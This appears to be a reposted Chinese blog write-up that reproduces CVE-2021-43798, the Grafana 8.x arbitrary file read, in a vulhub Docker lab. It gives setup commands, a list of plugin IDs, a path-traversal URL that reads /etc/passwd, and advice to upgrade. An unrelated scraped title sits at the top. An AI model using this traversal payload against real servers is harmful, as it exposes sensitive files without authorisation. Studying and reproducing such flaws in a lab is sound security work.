作者:手机用户2602882697 | 来源:互联网 | 2023-05-18 17:59
本文主要分享【UG打开出现line1331】,技术文章【CVE-2021-43798Grafana8.x任意文件读取漏洞复现】为【俺不想学习】投稿,如果你遇到相关问题,本文相关知识或能到你。U
本文主要分享【UG打开出现line 1331】,技术文章【CVE-2021-43798Grafana 8.x任意文件读取漏洞 复现】为【俺不想学习】投稿,如果你遇到相关问题,本文相关知识或能到你。
UG打开出现line 1331
1 漏洞信息 漏洞名称Grafana 8.x 任意文件读取漏洞漏洞编号CVE-2021-43798危害等级中危CVSS评分5.0漏洞类型中间件漏洞漏洞厂商Grafana漏洞组件Grafana受影响版本Grafana 8.0.0 - 8.3.0漏洞概述未授权的攻击者利用该漏洞,能够获取服务器敏感文件。 2 环境搭建 2.1 环境概述 Linux操作系统(vulhub) 2.2 搭建过程
进入到目标路径,拉取镜像
cd vulhub/grafana/CVE-2021-43798
docker-compose up -d
{width=“5.759722222222222in”
height=“0.5472222222222223in”}
查看容器信息,发现是3000端口
docker ps
{width=“5.759027777777778in”
height=“0.21805555555555556in”}
打开网页,搭建成功
{width=“5.759722222222222in”
height=“2.4993055555555554in”}
3 漏洞复现
在进行改漏洞的复现前我们需要先获取该网页一个已安装的插件id,比较常见的有:
alertlist
cloudwatch
dashlist
elasticsearch
graph
graphite
heatmap
influxdb
mysql
opentsdb
pluginlist
postgres
prometheus
stackdriver
table
text
我这里选用alertlist插件id来进行构造恶意的payload。
/public/plugins/alertlist/../../../../../../../../../../../etc/passwd
{width=“5.763194444444444in”
height=“4.811111111111111in”}
4 修复建议
1.升级到最新版本
本文《CVE-2021-43798Grafana 8.x任意文件读取漏洞 复现》版权归俺不想学习所有,引用CVE-2021-43798Grafana 8.x任意文件读取漏洞 复现需遵循CC 4.0 BY-SA版权协议。